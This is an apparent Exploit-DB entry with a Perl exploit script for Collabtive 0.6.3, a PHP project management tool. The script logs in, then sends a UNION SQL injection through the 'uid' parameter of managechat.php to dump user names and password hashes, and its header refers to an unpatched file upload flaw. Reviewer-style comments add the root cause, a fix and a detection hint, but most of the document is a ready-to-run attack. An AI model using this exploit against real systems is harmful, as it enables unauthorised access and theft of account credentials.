Collabtive 0.6.3 – Multiple Vulnerabilities

  • 作者: DNX
    日期: 2010-06-12
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/13844/
  • #!/usr/bin/perl
    use LWP::UserAgent;
    use HTTP::Request::Common qw(POST);
    use HTTP::Cookies;
    use Getopt::Long;
    
    # \#'#/
    # (-.-)
    #------------------oOO---(_)---OOo-----------------
    #|__ __ |
    #|_____/ /_____ ______/ /_________ ______ |
    #| / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |
    #|(__) /_/ /_/ / // /_/ / /_/ / /_/ (__)|
    #| /____/\__/\__,_/_//_.___/\__,_/\__, /____/ |
    #| Security Research Division/____/ 2o1o|
    #--------------------------------------------------
    #| Collabtive v0.6.3 Multiple Vulnerabilities |
    #--------------------------------------------------
    # [!] Discovered by.: DNX
    # [!] Homepage......: http://starbugs.host.sk
    # [!] Vendor........: http://collabtive.o-dyn.de
    # [!] Detected......: 04.06.2010
    # [!] Reported......: 05.06.2010
    # [!] Response......: xx.xx.2010
    #
    # [!] Background....: Collabtive ist eine web-basierte Projektmanagementsoftware.
    # Das Projekt startete im November 2007. Es ist eine
    # Open-Source-Software und stellt eine Alternative zu proprietären
    # Werkzeugen wie Basecamp dar. Collabtive ist in PHP geschrieben.
    #
    # Collabtive wird von einem professionellen Team entwickelt.
    #
    # [!] Requirements..: Account needed
    #
    # [!] Bug...........: $_GET['uid'] in managechat.php near line 64
    #
    # 12: $userto_id = getArrayVal($_GET, "uid");
    #
    # 64: $sel = mysql_query("SELECT * FROM chat WHERE ufrom_id IN($userid,$userto_id) AND userto_id IN($userid,$userto_id) AND time > $start ORDER by time ASC");
    #
    # The password is encoded with sha1.
    #
    # [!] Bug...........: The arbitrary file upload discovered by USH is still present.
    # See http://www.milw0rm.com/exploits/7076 more details.
    #
    
    # Usage banner. The usage example below passes host, path, -user X and
    # -pass Y, i.e. six elements in @ARGV, so testing $ARGV[5] is a crude
    # "were enough arguments given" check rather than real validation; note
    # that it runs before GetOptions has parsed anything.
    if(!$ARGV[5])
    {
    print "\n \\#'#/ ";
    print "\n (-.-)";
    print "\n ---------------oOO---(_)---OOo---------------";
    print "\n |Collabtive v0.6.3 SQL Injection Exploit|";
    print "\n | coded by DNX|";
    print "\n ---------------------------------------------";
    print "\n[!] Usage: perl collabtive.pl [Host] [Path] <Options>";
    print "\n[!] Example: perl collabtive.pl 127.0.0.1 /collabtive/ -user test -pass 12345";
    print "\n[!] Options:";
    print "\n -user [text]Username";
    print "\n -pass [text]Password";
    print "\n -p [ip:port]Proxy support";
    print "\n";
    exit;
    }
    
    # Option parsing and request setup for exploit().
    # NOTE(review): the script declares neither `use strict` nor `use warnings`.
    my %options = ();
    # GetOptions removes the named options from @ARGV (Getopt::Long's default
    # permute behaviour), so host and path are still at indices 0 and 1 below.
    GetOptions(\%options, "user=s", "pass=s", "p=s");
    my $ua= LWP::UserAgent->new();
    my $cookie= HTTP::Cookies->new();   # session jar, populated in exploit()
    my $host= $ARGV[0];
    my $path= $ARGV[1];
    # Plain http:// is hard-coded, so the login credentials sent in exploit()
    # travel unencrypted. $path must keep its trailing slash (as in the usage
    # example) because exploit() appends the script names directly to $target.
    my $target= "http://".$host.$path;
    my $user= "";    # both default to empty strings when the options are absent
    my $pass= "";
    
    # Optional HTTP proxy, given as ip:port.
    if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); }
    if($options{"user"}) { $user = $options{"user"}; }
    if($options{"pass"}) { $pass = $options{"pass"}; }
    
    print "[!] Exploiting...\n\n";
    
    exploit();
    
    print "\n[!] Done\n";
    
    # exploit()
    #
    # Performs the two steps described in the header comment: log in, then
    # request managechat.php with a crafted uid and print what the page
    # echoes back. Reads the file-scoped lexicals $target, $ua, $cookie,
    # $user and $pass; writes to STDOUT; its return value is not used.
    #
    # Defender notes (see the "[!] Bug" lines in the header):
    #   - Root cause: managechat.php takes uid from $_GET (line 12) and
    #     interpolates it unquoted into the SELECT at line 64, so any
    #     non-numeric uid alters the query. Mitigation: cast uid to an
    #     integer (or bind it as a query parameter) before it reaches
    #     mysql_query.
    #   - Detection: a request for managechat.php?action=pull whose uid
    #     parameter is not a plain integer has no legitimate source.
    #   - A valid account is required (header: "Account needed"), so this
    #     is a post-authentication issue; the header also notes the
    #     previously reported file-upload bug is still present.
    sub exploit
    {
    ##############
    # make login #
    ##############
    
    # POST the credentials, then copy the session cookie from the response
    # into $ua so the next request is authenticated. $res->is_success is not
    # checked, so a failed login simply makes the second request anonymous.
    my $url = $target."manageuser.php?action=login";
    my $res = $ua->post($url, [username => $user, pass => $pass]);
    $cookie->extract_cookies($res);
    $ua->cookie_jar($cookie);
    
    ############################
    # get users with passwords #
    ############################
    
    # The vulnerable request: uid is the injected parameter from the header.
    $url = $target."managechat.php?action=pull&uid=0) union select 1,2,name,4,5,6,pass from user/*";
    $res = $ua->get($url);
    my $content = $res->content;
    
    # The chat page separates entries with "<br />"; every fragment of the
    # form "<b>label:</b> value" is printed as "label:value". $_ is the
    # implicit loop variable; $1/$2 are used immediately after the match.
    my @c = split(/<br \/>/, $content);
    foreach (@c)
    {
    if($_ =~ /<b>(.*?):<\/b> (.*)/)
    {
    print $1.":".$2."\n";
    }
    }
    }